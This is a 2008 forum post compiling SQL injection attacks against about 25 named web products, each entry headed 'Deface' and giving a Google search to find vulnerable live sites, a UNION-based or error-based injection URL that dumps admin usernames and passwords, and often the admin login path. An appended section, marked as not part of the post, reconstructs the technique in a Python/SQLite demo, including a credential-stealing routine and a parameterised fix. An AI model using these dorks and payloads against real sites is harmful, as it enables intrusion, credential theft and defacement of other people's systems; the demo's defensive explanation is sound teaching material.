Title: SQL injection in full (all the injections)
Posted by: R1D4R on 13 December 2008, 20:02 pm

Here I leave this compilation of the different types of injections I found. All of them have been tested by me and of course, although it is somewhat hard to find sites with the vulnerability, they are out there ;)
Deface Fundlink
Google search: allinurl: "fundlinkllc.com"
SQL injection: showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users

Deface PHP-Newsletter (cat_id)
Google search: allinurl: "index.php?pgid" cat_id
SQL injection: index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

Deface Powered by Com Endeavors
Google search: allinurl: "index.php?go=detail"
SQL injection: index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2--

Deface Powered by niccell
Google search: "powered by niccell"
SQL injection: list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+admin_login/*

Deface KwsPHP v1.3.456
Google search: "index.php?mod=galerie" action=gal
SQL injection: index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*

Deface Powered by Esy
Google search: "Powered by Esy"
SQL injection 1: sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
SQL injection 2: sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

Deface showresult
Google search: allinurl: "index.php?p=poll" showresult
SQL injection: index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user

Deface powered by koobi-cms 4.3.0
Google search: "powered by koobi-cms 4.3.0"
SQL injection: index.php?area=1&p=gallery&action=showimages&galid=[SQL]
This one for the admin: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

Deface Powered by BosClassifieds Classified Ads System
Google search: "Powered by BosClassifieds Classified Ads System"
SQL injection: site.c0m/bosclassifieds/index.php?cat=[SQL]
Only for version: BosClassifieds 3.0

Deface Powered by SmallBiz eShop
Google search: Powered by SmallBiz eShop
SQL injection: index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(5,8)user(),char(5,version()),char)/*

Deface pollBooth
Google search: allinurl: "pollBooth.php?op=results" pollID
SQL injection: pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

Deface RS MAXSOFT
Google search: "RS MAXSOFT"
SQL injection: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
Admin login: admin.php?page=logfrm

Deface gallerypic img
Google search: allinurl: "index.php?p=gallerypic img_id"
SQL injection 1: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
SQL injection 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user
Admin login: admin/login.php

Deface Powered by SSWD
Google search: allinurl: "index.php?go=subcat"
SQL injection: index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*

Deface Powered by OpenLD
Google search: "Powered by OpenLD"
SQL injection: index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--

Deface Index php P Shop
Google search: allinurl: "index php p shop" categ
SQL injection: index.php?p=shop&show=showdetail&fid=ulus&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
Admin login: admin/login.php

Deface Powered by Site Sift
Google search 1: powered by Site Sift
Google search 2: allinurl: "index php go addpage"
Google search 3: allinurl: "index.php?go=detail id="
SQL injection 1: index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
SQL injection 2: index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Admin login: admin/login.php

Deface Showlink
Google search: allinurl: "index.php?showlink" links
SQL injection: index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
Admin login: admin/login.php

Deface Powered by eSyndiCat
Google search: © 2005-2006 Powered by eSyndiCat Directory Software
SQL injection: news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*

Deface CartWeaver
Google search: allinurl:Results.cfm?category=
SQL injection to get the admin username: Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers))
SQL injection to get the password: Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers))
Admin login: /cw2/admin/

Deface Bwired
Google search: "Powered by bwired" inurl:?newsID=
SQL injection: index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

Deface Powered by Md-Pro
Google search: "Powered by Md-Pro"
SQL injection: index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null from md_users where pn_uid=2/*

Deface Browse Blogs by Category
Google search: allintext:"Browse Blogs by Category"
SQL injection: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*

Deface eMeeting Online Dating Software 5.2
Google search: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
SQL injection 1: b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
SQL injection 2: b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

Deface FlashGameScript 1.7
Google search: "Powered by FlashGameScript"
SQL injection 1: index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2/*
SQL injection 2: index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2/*
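Added example (not part of R1D4R's post, and not code from any of the products listed): nearly every entry above is the same UNION-based pattern, and the post never explains why the payloads look the way they do. The Python/SQLite script below reconstructs that pattern on a made-up "articles" page: a negative id so the legitimate query returns nothing, a UNION whose column count is found by trial (that is where the long 1,2,3,... runs come from), one column carrying user and password glued together with a separator typed as a number so no quote character is needed, and a trailing /* to swallow whatever the application appends to the query. It then shows the same lookup with the id validated and bound as a parameter, which the payload bounces off. Table names, column names and the two credential rows are constructed for the demo. SQLite has no concat() and reads 0x3a as the integer 58, so the example uses || and char(58) where a MySQL payload would write concat(username,0x3a,password).

```python
import sqlite3

# Constructed sample data (not from the post): a public "articles" page queried
# by numeric id, and a separate users table holding hypothetical credentials.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT, published INTEGER);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO articles VALUES (1, 'Welcome', 'first post', 1);
INSERT INTO articles VALUES (2, 'Draft', 'not yet', 0);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'editor', '098f6bcd4621d373cade4e832627b4f6');
"""


def fresh_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def show_article_vulnerable(conn, article_id):
    """The bug every entry in the post relies on: the request parameter is
    pasted straight into the SQL text, so the database parses it as SQL."""
    sql = "SELECT title, body FROM articles WHERE id=" + article_id + " AND published=1"
    return conn.execute(sql).fetchall()


def show_article_fixed(conn, article_id):
    """Same lookup with the input validated as an integer and bound as a
    parameter: the value can never become part of the query text."""
    try:
        id_value = int(article_id)
    except ValueError:
        return []
    sql = "SELECT title, body FROM articles WHERE id=? AND published=1"
    return conn.execute(sql, (id_value,)).fetchall()


def find_column_count(conn, max_cols=20):
    """How the 1,2,3,... runs in the post are found: grow the UNION one column
    at a time until the database stops rejecting it. -1 empties the legitimate
    result; the trailing /* comments out the rest of the original query
    (here the ' AND published=1' the application appends)."""
    for n in range(1, max_cols + 1):
        probe = "-1 UNION SELECT " + ",".join(str(i) for i in range(1, n + 1)) + "/*"
        try:
            show_article_vulnerable(conn, probe)
            return n  # first width that parses is the real column count
        except sqlite3.DatabaseError:
            continue  # "SELECTs to the left and right of UNION do not have the same number of result columns"
    return None


def build_union_payload(ncols, expr, table, pos=0):
    """The post's payload shape: numeric filler in every column except one,
    which carries an expression reading from a table the page never shows."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos] = expr
    return "-1 UNION SELECT " + ",".join(cols) + " FROM " + table + "/*"


def steal_credentials(conn):
    """End to end: count columns, then read user:password pairs through the
    article page. MySQL payloads write concat(username,0x3a,password) because
    0x3a is ':' without typing a quote; SQLite's equivalent is
    username||char(58)||password."""
    ncols = find_column_count(conn)
    payload = build_union_payload(ncols, "username||char(58)||password", "users")
    rows = show_article_vulnerable(conn, payload)
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = fresh_db()
    print("legit  :", show_article_vulnerable(db, "1"))
    print("columns:", find_column_count(db))
    print("stolen :", steal_credentials(db))
    print("fixed  :", show_article_fixed(db, build_union_payload(2, "username", "users")))
```

A few things the script makes visible about the entries above: the /**/ between keywords are spaces replaced by empty comments so a filter that only looks for spaces lets the payload through (+ and %20 are just URL-encoded spaces); 0x61646D696E in the eMeeting payload is the string 'admin' written as a hex literal for the same no-quotes reason; and the two CartWeaver entries are a different technique, error-based rather than UNION-based, where convert(int, ...) on the admin name fails on MSSQL and the resulting error message echoes the value. The fixed function also shows why the fix is not "escape quotes": most of these payloads contain no quote at all, so only typing the value and binding it as a parameter closes the hole.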